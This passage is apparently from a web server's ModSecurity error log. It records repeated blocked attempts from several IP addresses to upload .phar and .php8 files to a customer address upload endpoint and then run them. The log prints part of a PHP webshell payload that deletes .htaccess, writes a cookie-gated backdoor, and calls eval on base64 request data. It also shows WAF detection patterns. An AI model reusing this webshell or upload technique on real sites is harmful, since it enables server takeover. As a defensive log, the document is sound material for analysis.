409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.phar"] [unique_id "aXOTqjhDL5QTdZ-T3ORXhwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:42.162364 2026] [:error] [pid 1596304] [client 185.65.202.110:59198] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.phar"] [unique_id "aXOTqjhDL5QTdZ-T3ORXhwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:42.162553 2026] [:error] [pid 1596304] [client 185.65.202.110:59198] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.phar"] [unique_id "aXOTqjhDL5QTdZ-T3ORXhwAAAAI"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:47.776888 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: t888364f428d25.php8 found within FILES:custom_attributes[country_id]: t888364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXOTr2MtiljrXZ04d2upkAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/8/t888364f428d25.phar
[Fri Jan 23 16:28:47.777520 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXOTr2MtiljrXZ04d2upkAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/8/t888364f428d25.phar
[Fri Jan 23 16:28:47.777670 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXOTr2MtiljrXZ04d2upkAAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/t/8/t888364f428d25.phar
[Fri Jan 23 16:28:47.913229 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Rule 7fc31f89dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.php8"] [unique_id "aXOTr2MtiljrXZ04d2upkQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:47.913699 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.php8"] [unique_id "aXOTr2MtiljrXZ04d2upkQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:47.916138 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.php8"] [unique_id "aXOTr2MtiljrXZ04d2upkQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Fri Jan 23 16:28:47.916325 2026] [:error] [pid 1596303] [client 185.65.202.110:59204] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/t/8/t888364f428d25.php8"] [unique_id "aXOTr2MtiljrXZ04d2upkQAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.734629 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Rule 7fea1155dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.phar"] [unique_id "aXUN9wMycXI8t6GrEiOW5AAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.735132 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.phar"] [unique_id "aXUN9wMycXI8t6GrEiOW5AAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.737647 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.phar"] [unique_id "aXUN9wMycXI8t6GrEiOW5AAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.737870 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.phar"] [unique_id "aXUN9wMycXI8t6GrEiOW5AAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.879564 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: je88364f428d25.php8 found within FILES:custom_attributes[country_id]: je88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXUN9wMycXI8t6GrEiOW5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/e/je88364f428d25.phar
[Sat Jan 24 19:22:47.880249 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXUN9wMycXI8t6GrEiOW5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/e/je88364f428d25.phar
[Sat Jan 24 19:22:47.880448 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXUN9wMycXI8t6GrEiOW5QAAAAo"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/j/e/je88364f428d25.phar
[Sat Jan 24 19:22:47.962713 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Rule 7fea1155dbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.php8"] [unique_id "aXUN9wMycXI8t6GrEiOW5gAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.963171 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.php8"] [unique_id "aXUN9wMycXI8t6GrEiOW5gAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.965482 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.php8"] [unique_id "aXUN9wMycXI8t6GrEiOW5gAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Jan 24 19:22:47.965648 2026] [:error] [pid 1621752] [client 91.84.106.190:57680] [client 91.84.106.190] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/j/e/je88364f428d25.php8"] [unique_id "aXUN9wMycXI8t6GrEiOW5gAAAAo"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:11.684055 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Rule 7fd71b0bdbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.phar"] [unique_id "aXaJv-aadwVRcnN0hBPLqgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:11.684538 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.phar"] [unique_id "aXaJv-aadwVRcnN0hBPLqgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:11.687019 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.phar"] [unique_id "aXaJv-aadwVRcnN0hBPLqgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:11.687195 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.phar"] [unique_id "aXaJv-aadwVRcnN0hBPLqgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:11.937031 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: do88364f428d25.php8 found within FILES:custom_attributes[country_id]: do88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXaJv-aadwVRcnN0hBPLqwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/o/do88364f428d25.phar
[Sun Jan 25 22:23:11.937678 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXaJv-aadwVRcnN0hBPLqwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/o/do88364f428d25.phar
[Sun Jan 25 22:23:11.937886 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aXaJv-aadwVRcnN0hBPLqwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/d/o/do88364f428d25.phar
[Sun Jan 25 22:23:12.225879 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Rule 7fd71b0bdbe8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.php8"] [unique_id "aXaJwOaadwVRcnN0hBPLrAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:12.226391 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.php8"] [unique_id "aXaJwOaadwVRcnN0hBPLrAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:12.228716 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.php8"] [unique_id "aXaJwOaadwVRcnN0hBPLrAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sun Jan 25 22:23:12.228892 2026] [:error] [pid 1654330] [client 213.109.225.211:40547] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/d/o/do88364f428d25.php8"] [unique_id "aXaJwOaadwVRcnN0hBPLrAAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
